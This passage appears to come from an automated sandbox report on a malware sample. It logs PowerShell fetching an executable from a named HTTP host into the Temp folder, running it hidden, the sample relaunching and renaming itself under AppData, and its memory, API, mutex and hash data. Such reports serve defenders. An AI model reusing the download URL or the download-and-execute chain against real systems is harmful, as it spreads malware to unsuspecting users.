| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | - | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Environment (121)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
115 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 351 bytes |
| Total Data Received | 132.00 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | greatvacationgiveaways.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) |
| Server Name | greatvacationgiveaways.com |
| Server Port | 80 |
| Data Sent | 351 |
| Data Received | 135168 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = greatvacationgiveaways.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /i0Qwfwrn |
|
1 | |
| Send HTTP Request | url = http://greatvacationgiveaways.com/i0Qwfwrn |
|
1 | |
| Receive HTTP Status | status = 200 |
|
1 | |
| Read Response | size_out = 135168 |
|
1 |
Process #7: bgd.exe
33
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\temp\bgd.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:01:56, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x89c |
| Parent PID | 0xabc (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00077fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00088fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001a8fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001c8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001effff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00797fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| bgd.exe | 0x00b00000 | 0x00b22fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | r |
|
|
|
- |
| esent.dll | 0x74420000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | os_pid = 0x8d0, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (24)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\bgd.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18f6f4 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18f5bc |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18f60c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18f66c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18f66c |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18f66c |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18f66c |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-26 15:53:48 (UTC) |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEMABC |
|
1 | |
| Create | mutex_name = PEM89C |
|
1 |
Process #8: bgd.exe
58
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\aetadzjz\appdata\local\temp\bgd.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:05, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d0 |
| Parent PID | 0x89c (c:\users\aetadzjz\appdata\local\temp\bgd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8C4
0x
8B4
0x
8C0
0x
8C8
0x
410
0x
7DC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00077fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00088fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00148fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00310000 | 0x00310fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00348fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00368fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0038ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00411fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x00636fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x00641fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x00650fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00660000 | 0x00663fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00660000 | 0x00663fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x009defff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x009e0000 | 0x009fffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00a00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00a10000 | 0x00a13fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00a20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00a70000 | 0x00a9ffff | Memory Mapped File | r |
|
|
|
- |
| bgd.exe | 0x00b00000 | 0x00b22fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0230ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02310000 | 0x02375fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002590000 | 0x02590000 | 0x02982fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cb0000 | 0x02cb0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| esent.dll | 0x74420000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75070000 | 0x750aafff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x750b0000 | 0x751a4fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75350000 | 0x75365fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75370000 | 0x75390fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x753a0000 | 0x7553dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75950000 | 0x7595dfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | 132.00 KB |
MD5:
31342e4b67aaa69e9a8a6bd6604dc668
SHA1: d4159ed9b7f143d9c686a51b16960d33565bec4a SHA256: 5f1032665271c1fdf50e36a10afca8f2413e297b73d5114a2ed3d0022008c649 SSDeep: 3072:rX/2i7MRvfSlSu+oV1D2y+Gsi1iOH++jj3fVQhxbfNWb8uTmTZ98+qZMKQTvIhEX:yi7MRvfSlSu+oV1D2y+GskiOH++j4xb3 |
|
|
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe:Zone.Identifier | - |
|
1 |
Module (30)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | user32.dll | base_address = 0x77820000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76b00000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\temp\bgd.exe | base_address = 0xb00000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\bgd.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x24f96c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x24f834 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x24f884 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x24f8e4 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x24f8e4 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x24f8e4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x24f8e4 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
